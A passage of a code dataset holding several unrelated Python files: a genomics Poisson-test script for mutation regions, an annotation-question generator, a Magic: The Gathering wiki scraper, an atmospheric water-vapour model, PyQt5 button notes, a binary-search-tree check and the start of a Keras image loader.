os.path.exists(ARGS.reference):\n raise IOError(\"--reference does not exist! \")\n\n if not os.path.exists(ARGS.genome_effective_json):\n raise IOError(\"--genome_effective_json does not exist! \")\n\n if not os.path.exists(ARGS.ctrl_BAM_json):\n raise IOError(\"--ctrl_BAM_json does not exist! \")\n\n if not os.path.exists(ARGS.treat_BAM_json):\n raise IOError(\"--treat_BAM_json does not exist! \")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load json file\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load meta data dict\n meta_data_dict = {}\n\n # load ctrl \n ctrl_meta_dict = json.load(open(ARGS.ctrl_BAM_json, \"rb\"))\n meta_data_dict[\"ctrl\"] = ctrl_meta_dict[\"count_dict\"].copy()\n\n # load treat\n treat_meta_dict = json.load(open(ARGS.treat_BAM_json, \"rb\"))\n meta_data_dict[\"treat\"] = treat_meta_dict[\"count_dict\"].copy() \n\n # test key \n if treat_meta_dict[\"count_dict\"].keys() != ctrl_meta_dict[\"count_dict\"].keys():\n raise ValueError(\"Ctrl json and Treat json file not match!\")\n\n # add total key to the dict \n meta_data_dict[\"ctrl\"] = _count_dict_sum_up(meta_data_dict[\"ctrl\"])\n meta_data_dict[\"treat\"] = _count_dict_sum_up(meta_data_dict[\"treat\"])\n\n # load genome count json \n genome_base_count_dict = None\n with open(ARGS.genome_effective_json,\"r\") as genome_info_file:\n genome_base_count_dict = json.load(genome_info_file)\n\n # make scale factor dict\n scale_factor_dict = _calculate_scale_dict(meta_data_dict, to_large_state=False).copy()\n\n # make normalize scale factor\n nomalize_scale_factor_dict = _calculate_scale_dict(meta_data_dict, to_large_state=False, scale_reads_count=ARGS.scale_reads_count).copy()\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load genome as dict\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n sys.stderr.write(\"Start to load genome ... \\t %s \\n\" % (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n\n genome_dict = load_reference_fasta_as_dict(ref_fasta_path=ARGS.reference, ref_name_list=\"All\")\n\n sys.stderr.write(\"Start to load genome. Done! \\t %s \\n\" % (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # calculate genome and chromosome background\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n bg_dict = {\n \"ctrl\" : {}, \n \"treat\" : {}\n }\n\n # genome background\n ctrl_bg_genome_lambda = meta_data_dict[\"ctrl\"][\"total\"][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][\"total\"][\"all_align_count.scale_factor\"] / (genome_base_count_dict[\"total\"][\"A\"] + genome_base_count_dict[\"total\"][\"T\"] + genome_base_count_dict[\"total\"][\"C\"] + genome_base_count_dict[\"total\"][\"G\"]) * 300\n treat_bg_genome_lambda = meta_data_dict[\"treat\"][\"total\"][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"treat\"][\"total\"][\"all_align_count.scale_factor\"] / (genome_base_count_dict[\"total\"][\"A\"] + genome_base_count_dict[\"total\"][\"T\"] + genome_base_count_dict[\"total\"][\"C\"] + genome_base_count_dict[\"total\"][\"G\"]) * 300\n\n bg_dict[\"ctrl\"][\"genome_bg\"] = ctrl_bg_genome_lambda\n bg_dict[\"treat\"][\"genome_bg\"] = treat_bg_genome_lambda\n\n # chromosome backround\n for ref_name in meta_data_dict[\"ctrl\"].keys():\n ctrl_bg_chr_lambda = meta_data_dict[\"ctrl\"][ref_name][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][ref_name][\"all_align_count.scale_factor\"] / (genome_base_count_dict[ref_name][\"A\"] + genome_base_count_dict[ref_name][\"T\"] + genome_base_count_dict[ref_name][\"C\"] + genome_base_count_dict[ref_name][\"G\"]) * 300\n treat_bg_chr_lambda = meta_data_dict[\"treat\"][ref_name][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"treat\"][ref_name][\"all_align_count.scale_factor\"] / (genome_base_count_dict[ref_name][\"A\"] + genome_base_count_dict[ref_name][\"T\"] + genome_base_count_dict[ref_name][\"C\"] + genome_base_count_dict[ref_name][\"G\"]) * 300\n \n bg_dict[\"ctrl\"][ref_name] = ctrl_bg_chr_lambda\n bg_dict[\"treat\"][ref_name] = treat_bg_chr_lambda\n\n # print background info to stderr\n sys.stderr.write(\"-\" * 80 + \"\\n\")\n sys.stderr.write(\"Out background info: \\t %s \\n\" % (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n sys.stderr.write(json.dumps(bg_dict, encoding=\"utf-8\", sort_keys=True, indent=4, separators=(', ', ': ')) + \"\\n\")\n sys.stderr.write(\"-\" * 80 + \"\\n\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load mpmat and calculate \n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n ctrl_bam_obj = pysam.AlignmentFile(ctrl_bam_filename, \"rb\")\n treat_bam_obj = pysam.AlignmentFile(treat_bam_filename, \"rb\")\n \n mpmat_file = open(mpmat_filename, \"rb\")\n mpmat_header = None\n mpmat_header_list = []\n\n if ARGS.mpmat_header:\n mpmat_header = mpmat_file.readline()\n mpmat_header_list = mpmat_header.strip().split(\"\\t\")\n\n # store pvalue in each region\n poisson_pvalue_list = []\n\n mpmat_info_dict = {\n \"ctrl_all_count\" : [],\n \"treat_all_count\" : [],\n \"ctrl_mut_count\" : [],\n \"treat_mut_count\" : [],\n \"ctrl_all_count.norm\" : [],\n \"treat_all_count.norm\" : [],\n \"ctrl_mut_count.norm\" : [],\n \"treat_mut_count.norm\" : [],\n \"log2FC_all_count\" : [],\n \"log2FC_mut_count\" : []\n }\n\n for line_idx, line in enumerate(mpmat_file):\n if line_idx % 100 == 0:\n sys.stderr.write(\"Processing line number: %s \\t %s \\n\" % (line_idx + 1, time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n\n line_list = line.strip().split(\"\\t\")\n\n try:\n mpmat_chr_name = line_list[0]\n mpmat_start = int(line_list[1])\n mpmat_end = int(line_list[2])\n except:\n raise ValueError(\"Input mpmat file have to contain chr_name, region_start, region_end in the first three columns, and separated by \\\\t\")\n\n ctrl_mpmat_count_dict = \\\n get_mpmat_region_count(\n in_bam_obj = ctrl_bam_obj,\n mpmat_chr_name = mpmat_chr_name,\n mpmat_region_start = mpmat_start,\n mpmat_region_end = mpmat_end,\n ref_genome_dict = genome_dict,\n query_mismatch_type_list = query_mut_type_list, \n other_mismatch_type_list = \"All\",\n region_mismatch_type_list = query_mut_type_list,\n region_query_mut_min_cutoff = region_mut_min_cutoff,\n query_mut_max_cutoff = query_mut_max_cutoff,\n total_mut_max_cutoff = total_mut_max_cutoff,\n other_mut_max_cutoff = other_mut_max_cutoff\n )\n\n treat_mpmat_count_dict = \\\n get_mpmat_region_count(\n in_bam_obj = treat_bam_obj,\n mpmat_chr_name = mpmat_chr_name,\n mpmat_region_start = mpmat_start,\n mpmat_region_end = mpmat_end,\n ref_genome_dict = genome_dict,\n query_mismatch_type_list = query_mut_type_list, \n other_mismatch_type_list = \"All\",\n region_mismatch_type_list = query_mut_type_list,\n region_query_mut_min_cutoff = region_mut_min_cutoff,\n query_mut_max_cutoff = query_mut_max_cutoff,\n total_mut_max_cutoff = total_mut_max_cutoff,\n other_mut_max_cutoff = other_mut_max_cutoff\n )\n\n # region lambda\n ctrl_mpmat_lambda = ctrl_mpmat_count_dict[\"region_mut_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n treat_mpmat_lambda = treat_mpmat_count_dict[\"region_mut_count\"] / 1.0 / scale_factor_dict[\"treat\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n\n # all reads lambda \n ctrl_mpmat_lambda_all = ctrl_mpmat_count_dict[\"all_align_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n treat_mpmat_lambda_all = treat_mpmat_count_dict[\"all_align_count\"] / 1.0 / scale_factor_dict[\"treat\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n\n # make lambda list \n ctrl_bg_lambda_list = [\n bg_dict[\"ctrl\"][\"genome_bg\"],\n bg_dict[\"ctrl\"][mpmat_chr_name],\n ctrl_mpmat_lambda \n ]\n\n treat_bg_lambda_list = [\n bg_dict[\"treat\"][\"genome_bg\"],\n bg_dict[\"treat\"][mpmat_chr_name]\n ]\n\n bg_lambda_list = [\n bg_dict[\"ctrl\"][\"genome_bg\"],\n bg_dict[\"ctrl\"][mpmat_chr_name],\n ctrl_mpmat_lambda,\n bg_dict[\"treat\"][\"genome_bg\"],\n bg_dict[\"treat\"][mpmat_chr_name]\n ]\n\n # select bg lambda\n if ARGS.lambda_method == \"ctrl_max\":\n bg_lambda = max(ctrl_bg_lambda_list)\n\n elif ARGS.lambda_method == \"treat_max\":\n bg_lambda = max(treat_bg_lambda_list)\n\n elif ARGS.lambda_method == \"max\":\n bg_lambda = max(bg_lambda_list)\n\n # mut reads get pvalue \n mut_pvalue = poisson_test(treat_mpmat_lambda, bg_lambda, alternative=\"larger\", method=\"score\")[1]\n poisson_pvalue_list.append(mut_pvalue)\n\n # all reads get pvalue \n # all_pvalue = poisson_test(treat_mpmat_lambda_all, ctrl_mpmat_lambda_all, alternative=\"larger\", method=\"score\")[1]\n\n # calculate normalized signal\n mpmat_ctrl_mut_count_nrom = ctrl_mpmat_count_dict[\"all_align_count\"] / 1.0 / nomalize_scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"all_align_count.scale_factor\"]\n mpmat_ctrl_all_count_nrom = ctrl_mpmat_count_dict[\"region_mut_count\"] / 1.0 / nomalize_scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"mut_align_count.scale_factor\"]\n\n mpmat_treat_mut_count_nrom = treat_mpmat_count_dict[\"all_align_count\"] / 1.0 / nomalize_scale_factor_dict[\"treat\"][mpmat_chr_name][\"all_align_count.scale_factor\"]\n mpmat_treat_all_count_nrom = treat_mpmat_count_dict[\"region_mut_count\"] / 1.0 / nomalize_scale_factor_dict[\"treat\"][mpmat_chr_name][\"mut_align_count.scale_factor\"]\n\n # calculate log2 fold change\n # if mpmat_ctrl_all_count_nrom != 0:\n # log2FC_all_count = math.log(mpmat_treat_all_count_nrom / 1.0 / mpmat_ctrl_all_count_nrom, 2)\n # else:\n # log2FC_all_count = math.log(mpmat_treat_all_count_nrom / 1.0, 2)\n\n # if mpmat_ctrl_mut_count_nrom != 0:\n # log2FC_mut_count = math.log(mpmat_treat_mut_count_nrom / 1.0 / mpmat_ctrl_mut_count_nrom, 2)\n # else:\n # log2FC_mut_count = math.log(mpmat_treat_mut_count_nrom / 1.0, 2)\n\n # All -> calculate log2 fold change fix \n if mpmat_ctrl_all_count_nrom != 0:\n all_count_FC = mpmat_treat_all_count_nrom / 1.0 / mpmat_ctrl_all_count_nrom\n else:\n all_count_FC = mpmat_treat_all_count_nrom / 1.0\n\n if all_count_FC > 0:\n log2FC_all_count = math.log(all_count_FC, 2)\n else:\n log2FC_all_count = \"NA\"\n\n # Mut -> calculate log2 fold change fix \n if mpmat_ctrl_mut_count_nrom != 0:\n mut_count_FC = mpmat_treat_mut_count_nrom / 1.0 / mpmat_ctrl_mut_count_nrom\n else:\n mut_count_FC = mpmat_treat_mut_count_nrom / 1.0\n\n if mut_count_FC > 0:\n log2FC_mut_count = math.log(mut_count_FC, 2)\n else:\n log2FC_mut_count = \"NA\"\n\n # add all info into dict\n mpmat_info_dict[\"ctrl_all_count\"].append(ctrl_mpmat_count_dict[\"all_align_count\"])\n mpmat_info_dict[\"treat_all_count\"].append(treat_mpmat_count_dict[\"all_align_count\"])\n\n mpmat_info_dict[\"ctrl_mut_count\"].append(ctrl_mpmat_count_dict[\"region_mut_count\"])\n mpmat_info_dict[\"treat_mut_count\"].append(treat_mpmat_count_dict[\"region_mut_count\"])\n\n mpmat_info_dict[\"ctrl_all_count.norm\"].append(mpmat_ctrl_all_count_nrom)\n mpmat_info_dict[\"treat_all_count.norm\"].append(mpmat_treat_all_count_nrom)\n\n mpmat_info_dict[\"ctrl_mut_count.norm\"].append(mpmat_ctrl_mut_count_nrom)\n mpmat_info_dict[\"treat_mut_count.norm\"].append(mpmat_treat_mut_count_nrom)\n\n mpmat_info_dict[\"log2FC_all_count\"].append(log2FC_all_count)\n mpmat_info_dict[\"log2FC_mut_count\"].append(log2FC_mut_count)\n\n # add pvalue into list\n # poisson_pvalue_list.append(max(mut_pvalue, all_pvalue))\n\n # add lambda into list \n # treat_lambda_list.append(treat_mpmat_lambda)\n # ctrl_lambda_list.append(ctrl_mpmat_lambda)\n\n # treat_all_lambda_list.append(treat_mpmat_lambda_all)\n # ctrl_all_lambda_list.append(ctrl_mpmat_lambda_all)\n\n # run_bg_lambda_list.append(bg_lambda)\n\n # close file\n mpmat_file.close()\n ctrl_bam_obj.close()\n treat_bam_obj.close()\n\n # End for loop and fix pvalue to FDR\n FDR_qvalue = multi.multipletests(np.array(poisson_pvalue_list), alpha=0.05, method=\"fdr_bh\", is_sorted=False)\n FDR_qvalue_vec = FDR_qvalue[1]\n\n # out final mpmat \n if ARGS.output == \"stdout\":\n out_file = sys.stdout\n else:\n out_file = open(ARGS.output, \"wb\")\n\n out_header_list = [\n \"chr_name\",\n \"region_start\",\n \"region_end\",\n \"ctrl_count\",\n \"treat_count\",\n \"ctrl_mut_count\",\n \"treat_mut_count\",\n \"ctrl_count.norm\",\n \"treat_count.norm\",\n \"ctrl_mut_count.norm\",\n \"treat_mut_count.norm\",\n \"log2_FC\",\n \"log2_FC_mut\",\n \"p_value\",\n \"FDR\"\n ]\n\n with open(mpmat_filename, \"rb\") as mpmat_raw_file:\n # out header \n mpmat_header_str = \"\\t\".join(out_header_list)\n out_file.write(mpmat_header_str + \"\\n\")\n\n if ARGS.mpmat_header:\n header = mpmat_raw_file.readline()\n\n for index, line in enumerate(mpmat_raw_file):\n line_list = line.strip().split(\"\\t\")[:3]\n \n append_info_list = [\n mpmat_info_dict[\"ctrl_all_count\"][index],\n mpmat_info_dict[\"treat_all_count\"][index],\n mpmat_info_dict[\"ctrl_mut_count\"][index],\n mpmat_info_dict[\"treat_mut_count\"][index],\n mpmat_info_dict[\"ctrl_all_count.norm\"][index],\n mpmat_info_dict[\"treat_all_count.norm\"][index],\n mpmat_info_dict[\"ctrl_mut_count.norm\"][index],\n mpmat_info_dict[\"treat_mut_count.norm\"][index],\n mpmat_info_dict[\"log2FC_all_count\"][index],\n mpmat_info_dict[\"log2FC_mut_count\"][index],\n poisson_pvalue_list[index],\n FDR_qvalue_vec[index]\n ]\n\n line_list += append_info_list\n line_str = \"\\t\".join(map(str,line_list))\n out_file.write(line_str + \"\\n\")\n\n # close output file \n if ARGS.output != \"stdout\":\n out_file.close()\n\n\n\n\n\n\n\n\n \n\n\n# 2019-12-28\n\n","sub_path":"code/find-significant-mpmat-V02.py","file_name":"find-significant-mpmat-V02.py","file_ext":"py","file_size_in_byte":28141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9239779","text":"from forte.data.multi_pack import MultiPack\nfrom forte.processors.base import MultiPackProcessor\n\nfrom edu.cmu import CorefQuestion, SuggestionQuestion\n\n\nclass QuestionCreator(MultiPackProcessor):\n \"\"\"\n Create questions for the coreference tasks.\n \"\"\"\n\n def _process(self, input_pack: MultiPack):\n q = CorefQuestion(input_pack)\n q.question_body = \"Place: Do you think the two events \" \"happen at the same place?\"\n q.options = [\n \"Exactly the same\",\n \"The places overlap\",\n \"Not at all\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = CorefQuestion(input_pack)\n q.question_body = \"Time: Do you think the two events \" \"happen at the same time?\"\n q.options = [\n \"Exactly the same\",\n \"They overlap in time\",\n \"Not at all\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = CorefQuestion(input_pack)\n q.question_body = \"Participants: Do you think the two events\" \" have the same participants?\"\n q.options = [\n \"Exactly the same\",\n \"They share some participants\",\n \"Not at all\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = CorefQuestion(input_pack)\n q.question_body = \"Inclusion: Do you think one of the events\" \" is part of the other?\"\n q.options = [\n \"Yes, the left event is part of right one\",\n \"Yes, the right event is part of left one\",\n \"No, they are exactly the same\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = SuggestionQuestion(input_pack)\n q.question_body = \"You consider these two to be different, \" \"could you tell us why?\"\n q.options = [\n \"One event is part of the other event.\",\n \"Some event details (e.g. time, location, participants) \" \"are conflicting.\",\n \"There is no enough information.\",\n \"The two events are completely un-related.\" \"Other reasons\",\n ]\n input_pack.add_entry(q)\n","sub_path":"multidoc-forte/processors/evidence_questions.py","file_name":"evidence_questions.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"599968067","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule: wikiinfo.py\nAuthor: zlamberty\nCreated: 2017-09-09\n\nDescription:\n utilities for parsing the mtg wiki at https://mtg.gamepedia.com/\n\nUsage:\n\n\n\"\"\"\n\nimport logging\nimport re\n\nimport requests\n\n# ----------------------------- #\n# Module Constants #\n# ----------------------------- #\n\nlogger = logging.getLogger(__name__)\n\n# tell requests to shut up\nlogging.getLogger('requests').setLevel(logging.WARN)\nlogging.getLogger('urllib3').setLevel(logging.WARN)\n\n\n# ----------------------------- #\n# Main routine #\n# ----------------------------- #\n\ndef _keyword_urls():\n # two categories: keyword actions and keyword abilities\n for templatename in ['Template:Infobox action', 'Template:Infobox keyword']:\n url = 'https://mtg.gamepedia.com/api.php'\n resp = requests.get(url,\n params={'action': 'query',\n 'list': 'embeddedin',\n 'eititle': templatename,\n 'eilimit': 1000,\n 'format': 'json'})\n j = resp.json()\n for item in j['query']['embeddedin']:\n yield item\n\n\ndef reminder_text():\n \"\"\"get a dictionary of keyword: reminder text values (useful for text\n analytics)\n\n \"\"\"\n remtext = {}\n for kwdict in _keyword_urls():\n kwname = kwdict['title'].lower()\n kwid = kwdict['pageid']\n try:\n resp = requests.get(url='https://mtg.gamepedia.com/api.php',\n params={'action': 'parse',\n 'pageid': kwid,\n 'prop': 'wikitext',\n 'format': 'json'})\n infobox = resp.json()['parse']['wikitext']['*']\n\n remtextnow = re.search('\\| reminder = (.*)', infobox, re.I)\n remtextnow = remtextnow.groups()[0].lower()\n if remtextnow[-1] == '.':\n remtextnow = remtextnow[:-1]\n\n remtext[kwname] = remtextnow\n\n logger.debug('SUCCESS: {}'.format(kwname))\n except AttributeError:\n logger.debug('SUCCESS: {} (no reminder text)'.format(kwname))\n except Exception as e:\n logger.warning('FAILURE: {}'.format(kwname))\n logger.debug('\\texception: {}'.format(e))\n\n return remtext\n","sub_path":"mtg/extract/wikiinfo.py","file_name":"wikiinfo.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"283758446","text":"import math\nimport numpy as np\n\n\nclass use_ARIS(object):\n \"\"\"\n This class is used to convert the atmosphere data that is obtained from\n ARIS to a useful datatype. It loads in the atmosphere data, converts it to\n a matrix and converts the Extra Path Length to the precipitable water vapor\n using the Smith-Weintraub equation for the Extra Path Length and the Ideal\n Gas Law (later, hopefully the VanDerWaals law).\n \"\"\"\n\n a = 6.3003663 #m\n h = 1000 #m\n\n def __init__(self, x_length_strip, sourcepath, prefix_filename, pwv_0, grid, windspeed, time, max_num_strips, separation, beam_radius, loadCompletePwvMap = 0):\n #make function to convert EPL to pwv\n self.pwv_0 = pwv_0\n self.prefix_filename = prefix_filename\n self.grid = grid\n self.windspeed = windspeed\n self.max_num_strips = max_num_strips\n self.sourcepath = sourcepath\n self.x_length_strip = x_length_strip\n self.filtered_pwv_matrix = \"None\"\n self.separation = separation\n self.beam_radius = beam_radius\n if loadCompletePwvMap:\n self.load_complete_pwv_map()\n else:\n self.initialize_pwv_matrix(time)\n\n def calc_e_from_pwv(pwv):\n \"\"\"Calculates the simple partial pressure of water vapor, using the\n VanDerWaals equation of state and values for the parameters a and b\n taken from 'CRC Handbook for chemistry and physics', 64th edition.\n\n Returns\n ------------\n e: scalar or array\n partial pressure of water vapor\n Unit: kPa\n \"\"\"\n a = 5.536e-4\n b = 3.049e-5\n T = 273\n rho = 55.4e3\n R = 8.314459\n e = R * T * pwv/(use_ARIS.h - b * pwv * rho) - (a * (pwv**2) * (rho**2)) / (use_ARIS.h**2)\n return e\n\n def calc_e_from_EPL(self, EPL):\n \"\"\"Calculates the partial pressure of water vapor, using the Smith-Weintraub\n formula for Extra Path Length (DOI: 10.1109/JRPROC.1953.274297)\n\n Returns\n ------------\n e: scalar or array\n partial pressure of water vapor\n Unit: kPa\n \"\"\"\n k2 = 70.4e2 #K/kPa\n k3 = 3.739e7 #K**2/kPa\n T = 273\n e = 1e6/self.h * EPL/(k2/T + k3/(T**2))\n return e\n \"\"\"\n def load_complete_pwv_map(self):\n \"\"\"\"\"\"Loads the previously saved pwv map. This map is already filtered with\n a Gaussian beam.\n \"\"\"\"\"\"\n print('Number of atmosphere strips loaded: ', self.max_num_strips)\n #path = self.path_model + '/Data/output_ARIS/complete_filtered_pwv_map.txt'\n path = self.sourcepath.joinpath('complete_filtered_pwv_map.txt')\n self.filtered_pwv_matrix = np.loadtxt(path)\n \"\"\"\n def initialize_pwv_matrix(self, time):\n \"\"\"Initializes the pwv_matrix property of the use_ARIS instance. It loads\n in the amount of atmosphere strips that it needs, converts it into a matrix\n and then converts EPL to pwv.\n \"\"\"\n max_distance = (time*self.windspeed + 2*self.separation)\n max_x_index = math.ceil(max_distance/self.grid)\n num_strips = min(math.ceil(max_x_index/self.x_length_strip), self.max_num_strips)\n grid_dif = int(round(self.separation/self.grid))\n dEPL_size = int(round(self.beam_radius/self.grid))+2*grid_dif\n #print('Number of atmosphere strips loaded: ', num_strips)\n for i in range(num_strips):\n filename = self.prefix_filename + (3-len(str(i))) * \"0\" + str(i)\n d = np.loadtxt(self.sourcepath.joinpath(filename), dtype = float, delimiter=',', skiprows = 18)\n if i == 0:\n nx = int(max(d[:, 0])) + 1\n ny = int(max(d[:, 1])) + 1\n # print('nx: ', nx)\n # print('ny: ', ny)\n epl= np.zeros([nx,ny])\n for j in range(len(d)):\n epl[int(d[j, 0])-int(d[0, 0]), int(d[j, 1])] = int(d[j, 2])\n if i == 0:\n self.dEPL_matrix = epl[:, 0:dEPL_size]\n else:\n self.dEPL_matrix = np.concatenate((self.dEPL_matrix, epl[:, 0:dEPL_size]), axis = 0)\n self.pwv_matrix = self.pwv_0 + (1/self.a * self.dEPL_matrix*1e-6)*1e3 #in mm\n self.pwv_matrix = np.array(self.pwv_matrix)\n\n def obt_pwv(self, time, count, windspeed):\n \"\"\"Obtains the precipitable Water vapor from the pwv_matrix at 5 different positions, to\n make sky chopping and nodding possible in 2 directons.\n\n Returns\n ------------\n pwv: array\n precipitable water vapor on at 5 different positions.\n Unit: m\n \"\"\"\n pwv_matrix = self.filtered_pwv_matrix\n positions = self.calc_coordinates(time, windspeed)\n pwv = np.array([pwv_matrix[positions[0]], pwv_matrix[positions[1]], pwv_matrix[positions[2]], pwv_matrix[positions[3]], pwv_matrix[positions[4]], pwv_matrix[positions[5]]])\n return pwv\n\n def calc_coordinates(self, time, windspeed):\n \"\"\"Calculates the positions at which the pwv needs to be taken. Five\n different positions are taken, to make sky chopping and nodding possible\n in 2 directons.\n\n Returns\n ------------\n Positions: array\n The positions (gridpoints) at which the pwv needs to be taken.\n \"\"\"\n grid_dif = int(round(self.separation/self.grid)) #number of gridpoints difference between positions\n distance = time*windspeed\n x_index = (int(round(distance/self.grid)))\n y_index = int(round(self.beam_radius/self.grid))+grid_dif - 1#int(23/self.grid)-1 #23m, the -1 is to be in accordance with python array indexing\n pos_1 = x_index + grid_dif, y_index\n pos_2 = x_index + grid_dif, y_index\n pos_3 = x_index + grid_dif, y_index\n pos_4 = x_index + grid_dif, y_index + grid_dif\n pos_5 = x_index + grid_dif, y_index - grid_dif\n pos_6 = x_index + grid_dif, y_index\n positions = [pos_1, pos_2, pos_3, pos_4, pos_5, pos_6]\n return positions\n","sub_path":"tiempo_deshima/Atmosphere/use_aris.py","file_name":"use_aris.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"43373258","text":"from PyQt5.Qt import *\nimport sys\n\napp = QApplication(sys.argv)\n\nwindow = QWidget()\nwindow.setWindowTitle(\"title\")\nwindow.resize(500, 500)\nwindow.show()\n\n\"\"\"\nQPushButton:\n 用来给用户点击,来完成某种动作,一般是矩形\n 继承于 QAbstractButton\n\n创建:\n QPushButton()\n QPushButton(parent)\n QPushButton(text, parent)\n QPushButton(icon, text, parent)\n\n菜单:\n setMenu(QMenu):设置菜单\n menu():获取菜单\n showMenu():展示菜单\n QMenu():\n addMenu(QMenu):添加子菜单\n addSeparator():添加分隔线\n addAction(QAction):添加行为动作\n setTitle(str):设置标题\n setIcon(QIcon):设置图标\n \n QAction设置:\n setText(str):设置内容\n setIcon(QIcon):设置图标\n 信号:triggered\n边框是否保持扁平:\n setFlat(bool):默认为False,设置为True时,除非按下按钮,否则大多数样式都不会绘制按钮背景\n isFlat():获取当前按钮边框是否扁平\n默认处理:\n setAutoDefault(bool):\n 设置为自动默认按钮\n 在某些GUI样式中,默认按钮被绘制,其周围有一个额外的框架,三个像素或者更多\n Qt会自动在自动默认按钮周围保留此空间,即自动默认按钮可能会有稍大的提示\n 对于具有QDialog父级的按钮,此属性的默认值为True,否则默认值为False\n autoDefault()\n setDefault(bool)\n isDefault()\n\n信号基本继承了 QAbstractButton 和 002-QWidget\n\n自定义上下文菜单请求信号:customContextMenuRequested(QPoint)\n setContextMenuPolicy(Qt.CustomContextMenu)\n Qt.DefaultContextMenu:调用对象方法contextMenuEvent()\n Qt.CustomContextMenu:发射信号\n\"\"\"\n\n\nsys.exit(app.exec_())\n\n","sub_path":"004-GUI编程/PyQt5/004-QPushButton/007-QPushButton.py","file_name":"007-QPushButton.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"156321678","text":"import sys\nimport threading\n\nsys.setrecursionlimit(10**7) # max depth of recursion\nthreading.stack_size(2**25) # new thread will get stack of such size\n\n\ndef IsBinarySearchTree(tree):\n node_index = 0\n curr_max = float(\"-inf\")\n # inOrder traversal, make sure the next value is > than curr_max\n\n if len(tree) <= 1:\n return True\n else:\n stack = [0, 0]\n while stack:\n node_index = stack.pop()\n if stack and node_index == stack[-1]:\n if tree[node_index][1] != -1:\n stack.append(tree[node_index][1])\n stack.append(tree[node_index][1])\n else:\n if tree[node_index][0] <= curr_max:\n return False\n else:\n curr_max = tree[node_index][0]\n if tree[node_index][2] != -1:\n stack.append(tree[node_index][2])\n stack.append(tree[node_index][2])\n return True\n\n\ndef main():\n nodes = int(sys.stdin.readline().strip())\n tree = []\n for i in range(nodes):\n tree.append(list(map(int, sys.stdin.readline().strip().split())))\n if IsBinarySearchTree(tree):\n print(\"CORRECT\")\n else:\n print(\"INCORRECT\")\n\n\nthreading.Thread(target=main).start()\n","sub_path":"Data Structures/week6_binary_search_trees/2_is_bst.py","file_name":"2_is_bst.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47391747","text":"import os, cv2\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras import backend as K\r\nimport matplotlib.pyplot as plt\r\nfrom keras.optimizers import Adam\r\ntrain_path = './lateblight_yellowleafcurl/train/'\r\ntest_path = './lateblight_yellowleafcurl/test/'\r\nclasses = [\"lateblight\", \"yellowleafcurl\"]\r\n\r\nnum_classes = len(classes) # 클래스=종속변수=label의 개수 -> 2개이므로 binary classification\r\nwidth = 32\r\nheight = 32\r\nchannel = 3\r\n\r\nX_train = [] # train 이미지\r\nY_train = [] # train label\r\nX_test = [] # test 이미지\r\nY_test = [] # test label\r\n\r\ndef load_image(paths, x_list, y_list, l):\r\n for top, dir, f in os.walk(paths):\r\n for filename in f:\r\n #print(paths + filename)\r\n img = cv2.imread(paths + filename)\r\n img = cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA).flatten()\r\n x_list.append([np.array(img).astype('float32')])\r\n y_list.append(l)\r\n\r\nfor idx, label in enumerate(classes):\r\n labeling = [0 for i in range(num_classes)]\r\n labeling[idx] = 1\r\n train_image = train_path + label + \"/\"\r\n test_image = test_path + label + \"/\"\r\n\r\n load_image(train_image, X_train, Y_train, labeling) # train 이미지 로드\r\n load_image(test_image, X_test, Y_test, labeling) # 